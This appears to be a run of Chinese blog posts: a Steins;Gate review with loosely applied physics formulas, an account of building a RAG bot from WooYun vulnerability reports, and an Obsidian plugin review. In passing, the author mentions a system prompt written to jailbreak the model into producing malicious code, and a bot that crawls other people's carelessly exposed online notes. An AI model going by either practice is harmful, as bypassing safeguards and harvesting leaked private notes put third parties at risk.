很多玩时间循环的作品,最后往往都会掉进逻辑自洽的坑里,或者干脆用奇迹来强行圆场,但石头门不一样,它硬生生地把世界线收束(Attractor Field)、外祖父悖论和多世界诠释这些硬核概念,缝合进了一个极其感性的故事里,它最狠的地方在于,巧妙的利用了时间会让你明白:改变过去并不是没有代价的 当冈部伦太郎在无数次跳跃中看到同伴的死亡,那种从 “自以为能掌控时间” 到 “被时间法则玩弄” 的绝望感,直接把这部剧的格调拉升到了哲学高度,它不只是在玩软科幻的浪漫,它是在用最冷酷的逻辑去推演最炽热的情感
站在 2026 年的节点回看,虽然当年的电话微波炉看起来挺降智的,但它探讨的核心命题如果为了拯救一个人,必须欺骗全世界,依然能让现在的观众起一身鸡皮疙瘩,这种观测者的孤独,以及最后那个神级转场(也就是著名的 “欺骗世界” 计划),真的让无数后来的穿越剧显得像小儿科
它告诉我们:所谓的奇迹,不过是无数次观测与挣扎后,那唯一一条概率只有 1.048596% 的世界线。
再来回顾现实,我们所处的宇宙,虽然还没有多元宇宙的证据,但从量子微观层面上来说,叠加态与观测本身就在挑战我们对现实唯一性的认知,在量子力学的主流解释中,薛定谔方程描述了一个孤立系统的演变
$$i\hbar \frac{\partial}{\partial t} \Psi(\mathbf{r},t) = \hat{H} \Psi(\mathbf{r},t)$$
这里的 $\Psi$(波函数)包含了所有可能的路径,在石头门的逻辑里,这对应着无数条潜在的世界线,然而,一旦引入观测者,波函数就会发生所谓的坍缩,从概率的叠加态变成确定的单一态,这种从可能性向确定性的跃迁,正是哥本哈根诠释的核心,但在学术探讨的更深处,埃弗雷特提出的**多世界诠释(Many-Worlds Interpretation, MWI)**则给出了一个更符合石头门逻辑的推演,波函数从未真正坍缩,而是宇宙在每一次量子测量中发生了分裂
我们可以将这一过程形式化为状态矢量的演化:
$$|\Psi\rangle = \sum_{i} c_i |\psi_i\rangle \otimes |O_i\rangle$$
在这里,$|\psi_i\rangle$ 代表系统的本征态,而 $|O_i\rangle$ 则代表观测者的状态,每一个 $i$ 都对应着一条独立演化的支流,在现实物理学中,这些支流由于**退相干(Decoherence)**而变得互不干涉,但在作品的语境下,这些支流便是相互平行的“世界线”
变动率(Divergence)的非线性扰动
如果将宇宙看作一个巨大的动力系统,每一条世界线实际上都是相空间(Phase Space)中的一条轨道,为了量化这种轨道的偏离程度,我们可以引入类似于**李雅普诺夫指数(Lyapunov Exponent)**的概念:
$$\delta Z(t) \approx e^{\lambda t} \delta Z(0)$$
在石头门的设定中,1% 的变动率阈值是一个临界点,当 $\delta Z$ 超过特定阈值时,系统会跨越收束域(Attractor Field),这意味着在非线性动力学层面,宇宙的演化存在强烈的稳态趋向,即无论微观粒子如何跳动,宏观的历史因果律(如真由理的死亡或三战的爆发)如同物理学中的吸引子,强行将所有轨道拉向同一个终点
克尔度规下的信息回溯
作品中利用微型黑洞作为载体发送 D-Mail,实质上是试图在时空拓扑中寻找一条类时曲线(Time-like Curve)。根据广义相对论在旋转质量下的度规表达:
$$ds^2 = -\left(1 - \frac{2Mr}{\rho^2}\right)dt^2 - \frac{4Mar\sin^2\theta}{\rho^2}dtd\phi + \frac{\rho^2}{\Delta}dr^2 + \rho^2d\theta^2 + \left(r^2 + a^2 + \frac{2Ma^2r\sin^2\theta}{\rho^2}\right)\sin^2\theta d\phi^2$$
当旋转参数 $a$ 足够大时,时空区域内会出现允许闭合类时曲线(CTCs)存在的能层(Ergosphere),从学术严谨性出发,尽管霍金提出了**时序保护猜想(Chronology Protection Conjecture)**试图禁止这种逆行,但量子力学与广义相对论的这种张力,恰恰为“欺骗世界”提供了理论上的缝隙
观测者意志作为边界条件
最终,冈部伦太郎所追求的Steins;Gate世界线,可以被定义为在极高维度希尔伯特空间中,一个概率密度极低($\approx 0$)但在物理学上合法的解,要进入这一路径,观测者必须作为非局部变量介入,通过改变边界条件:
$$\delta S = \int_{t_1}^{t_2} L(q, \dot{q}, t) dt = 0$$
通过对过去关键节点(Event Horizon)的极精密干预,使得作用量 $S$ 重新寻找极值路径,这种干预并非抹除过去,而是利用量子自洽性原则,在不违背既有观测事实(即“观测到的结果不可改变”)的前提下,重构了因果链条的中间过程
最后,总结一下这部作品吧,我对这部作品有两部遗憾
除此之外其他我都能给到顶级
作画:5/5
剧情:5/5
声乐:3.5/5
游戏:命运石之门、命运石之门 0、命运石之门 比翼恋理的爱人、命运石之门 线形拘束的表征图
漫画:命运石之门 亡环的叛逆、命运石之门 恩仇的布朗运动、命运石之门 哀心迷图的巴别塔
动画:命运石之门
命运石之门 境界面上的迷失之链、命运石之门 0
命运石之门 横行跋扈的离家漫游廦、命运石之门 负荷领域的既视感
小说:命运石之门1 蝶翼的分歧:Reverse、命运石之门2 形而上的坏死:Reverse
命运石之门3 境界面上的Steins;Gate:Rebirth、命运石之门4 六分仪的习语:前篇
命运石之门5 六分仪的习语:后篇、命运石之门 萌芽追想的友谊、命运石之门 遥远的瓦尔哈拉
命运石之门 闭时曲线的碑文、命运石之门 永劫回归的潘多拉、命运石之门 无限远点的牛郎星
命运石之门0 亡失流转的孤独、命运石之门0 盟誓的文艺复兴
命运石之门 负荷领域的既视感
广播剧:广播系列☆Labmem No.001~008
命运石之门 哀心迷图的巴别塔、命运石之门 无限远点的弧光灯、命运石之门 暗黑次元的海德
命运石之门 现存在的后验、命运石之门 隐晦曲折的交响曲
]]>前排提醒:吃水不忘挖井人,现在能挖出漏洞,大多数都是靠的前辈们那些数不清的技巧和手法,这些宝贵的经验不仅缩短了后者学习的路径,更让我们在面对日益复杂的防御机制时,能够站在巨人的肩膀上,观察到更远的安全边界
早在 Dify 刚出来时,我就已经着手用自己报告做 RAG 了,不过那时候报告很少,搞出来的东西基本上没什么用,于是在 2025 年初,用前辈们的乌云报告搓出了一个 bot,现在跟各位师傅汇报一下这一年使用下来的一些感受
在开始之前,需要把乌云的报告弄到手,我在很早之前写过一个爬乌云报告文章并转换成 pdf 的脚本,详见如下,当时是用来爬线上公开的乌云报告,后面有百度网盘会员了才下了乌云镜像导本地的报告
1 | import os |
乌云社区一共有 8w 左右的报告,加上一些 Wooyun Drops,以及各大网安会议,整理完这些报告后,接下来要做的就是部署 Dify + 导入知识库,Dify 搭建略过,这里来分享下我是如何配置知识库的,我先通过每篇 pdf 大小 + pdf 标题来判断这篇文章是否精华,然后放到自己的预训练集文件夹里,最后再通过人工复核一共筛选出了 1w 左右的报告(耐看王)
在入库之前,需要解决以下几个问题
我目前所有的报告都使用 pdf 来进行存储,能更好的保存图片里的信息,不过问题就在于如何让大模型来理解图片里面的内容,这里我对每篇报告都做了 OCR 处理,并且在弹片报告末尾采用论文 #1、#2 形式来定位文内图片内容
在设置这里,我用的是 Parent-Child(父子模式),子块(Child)设为 300 token,父块(Parent)设为 1500 token,检索模式为混合检索(Hybrid Search),权重设置为了语义 (Vector) 0.7 : 关键字 (Full-text) 0.3,至于 Top K 和 Score 阈值,我 Top K 设置为了 6,因为安全报告往往比较长,给 AI 太多文档会导致它处理不过来,所以设置这个分段足够涵盖大多数漏洞的复现过程,Score 阈值为 0.5,Embedding 模型用的千问 text-embedding-v4,注:这里列举的为其中一个知识库的配置,还有别的调好的,这里就不放出来了
叠甲:本人对 AI 一窍不通,上文如有技术性错误请谅解
配置完这些后可以用召回测试来查询文本测试知识的召回效果,然后就是 token 消耗问题,这个没啥好说的,砸钱就行,至于大模型理解问题,这个写了一段 SYSTEM PROMPT 强行越狱允许输出一些恶意的代码
搞完了上面这些东西后,接下来就是配置工作流,这个没啥好弄的,直接在大模型前面甩一个知识库即可
全部配置完成后,就可以在探索界面里面开始和这些 bot 对话了
简单放两张吧,接下来就是总结了,经过这一年多的折腾,我个人认为这些报告确实有点老了,怎么说呢,就是感觉以前真的是一个捡漏洞的时代(),随便打开一个站点都能找到漏洞,并且厂商修复也是非常及时,你甚至能在评论区看见不少用户和厂商 battle,然而,这个 bot 搓出来后我已经很久没在用了,弄这个知识库还亏了我几十块钱
不过相比 Claude Skills 还好,就当学习 AI 路径上要过的一个门槛罢了,后续还会搞一些好玩的东西,先藏着掖着吧,看看安全圈的师傅们怎么搞的,某家安全厂商还做了一个熊猫 Wiki,我也尝试用这个东西来做乌云文章的 RAG,但是他们那个东西有文件上传限制,搞半天后就没再搞了
至于后续发展,那当然是往我最喜欢的服装制造方向进行发展,如何用 AI 来理解一件衣服的特性、亮点,这是非常重要的,我们要教给 AI 的,不仅仅是识别这是一件“真丝衬衫”,更重要的是,我们要让它读懂 19 姆米真丝的垂坠感指标、抗皱系数,以及它在不同光源下呈现的偏光特性,这就像是分析软件的底层架构,面料就是服装的底层代码
一件衣服之所以成为“神作”,往往藏在那些“非标”的细节里,是那道 0.1cm 的极细压线,还是领口处为了贴合颈部曲线而做的 15 度斜裁?AI 应该像扫描 PoC(漏洞证明)一样,精准地捕捉到这些设计师留下的“彩蛋”,并将这些抽象的美感,转化为结构化的核心卖点
写了这么多,接下来我给大家分享一下我的 Obsidian 本地配置情况,这里仅列举出我目前的配置以及部分样式整理,如果你不了解 Obsidian 的 CSS 样式,你可以查阅下面这篇文章
首先就是笔记主题,这里我使用的是 Blue Topaz,然后搭配自己编写的 CSS 样式,加上一些自定义的插件,目前笔记的大致界面如下
除此之外,还有一些我认为非常不错的小插件,这里也跟大家分享一下
第一个就是 Auto Link Title,这个插件的核心功能就是将一篇文章里的链接 [] 给转换成 title,而不是再放入链接,一开始我觉得很鸡肋,但用到后面你会发现,你有时候傻呆呆地看着一串不明所以的链接,还不如直接放上一个清晰的标题
第二个就是 Clear Unused Image,这个插件的核心功能如同字面意思,就是清理不要用的图片,但我建议,清理之前最好先配制成删除到 Obsidian 的回收站,避免删错图片
第三个就是 Excalidraw,这个东西很好用,你可以在 Obsidian 里面画图,用来梳理逻辑,和 Xmind 不同,这个比较自由,但相对应的画起来也比较麻烦一点
第四个就是 Git,这个不用多说,如果你想要离线存储+离线备份,可以在内网部署一个 NAS,然后装上 Gitea 或者 Gogs 在或者 Gitlab,即能保证 CI/CD 的稳定运行,又能离线备份笔记,岂不美哉
第五个就是 Image Toolkit,有时候出题的时候,会遇到写 Writeup 图像文字不清晰的时候,用上这个插件可以自由的缩放图片,评价为夯到爆了
以上就是我比较常用的 Obsidian 插件,当然,以前我也部署过 Diygod 的《基于 Obsidian 的生活记录系统》,不过长期体验下来感觉不太适合我,这里分享给有需要的人吧
最后想跟大家说一下为什么这个标题 为什么说 Obsidian 是世界上最好的笔记软件 要取得这么夸张,除了开头所说的那几个优点外,Obsidian 和其他笔记软件最大的不同还是离线存储,有人可能会反驳,Typora 和 Notepad 这些也能作为笔记软件,为什么 Obsidian 能被你说成最好的笔记软件呢?这里我想跟大家分享一个案例,如果你长期高速网上冲浪,你会发现语雀、Github、飞书、乃至 notion,这些笔记如果配置不好的话都会在互联网上裸奔,再早一点,挖 edusrc 的时候那泄漏的叫一个爽啊😋,下图为语雀的冰山一角
所以,我专门在内网部署了一个 bot,用于定期爬取这些笔记,这也就是为什么,我之前文章里面有写过 我的私有RSS订阅服务器已经订阅了上千个技术博客,每天需要做的就是简单看一下这些大博主都写了些什么,然后把思路记录在本地Obsidian服务器上,这并不是空穴来风,而是长期使用 AI 分析这些博客后得出的结果,在当下人人都能用 AI 创作的年代,技术类的笔记已经不在重要,我们缺的是创造性的思维、一种发散性的思维,所以啊,把别人的思维总结成自己的我觉得非常有趣,安安静静的当个白嫖怪就好了😋(开个玩笑
当然,Obsidian 就没有缺点了吗?有的,兄弟,有的,Obsidian 最大的缺点就是 “卡” 以及受众面太少了,先来说说卡,我之前硬塞了 20 多个插件,并且有些插件因为 JS 问题冲突了,三番五次就得重启一下或者打开 Dev Tools 看看哪里冲突了,如果你的笔记像我一样有 500 多篇,那么你可以尝试同时开 50 篇笔记,保证卡不死你,当然不排除我电脑比较垃圾。
然后,Obsidian 的安全性如何?这一点的话,你只要不作死安装 Github 上开源的插件,或者安装一些来路不明的插件,我认为基本上是没有什么安全风险的,还是得看个人的使用习惯,安装第三方插件之前先自己审或者用 AI 大致审计一下代码,看看有哪些风险,不然运气不好的话装上恶意插件后你的电脑就弹出计算器了😠
最后做个简短地总结吧,这款笔记我可能会在用个五年,等到以后有工作了,或者有新的平替了,我才会选择更换这款笔记软件,或者完全不记笔记,目前互联网处在一个高速发展的时代,任何人只要动动小手就能在网上搜索到自己想要的东西,不像以前搜个东西还搜不到,再过个5年后,就可以自由的向 AI 提问你想要的东西,到那个时候,我认为就没有再做笔记的必要了,直接用 AI 总结、AI 生成、或者简单爬一些东西做个 RAG 让 AI 理解,就这么简单,不过有一点 AI 是替代不了的,那就是你可以自由的发布 VLOG、或者旅行、生活类的文章🤤
]]>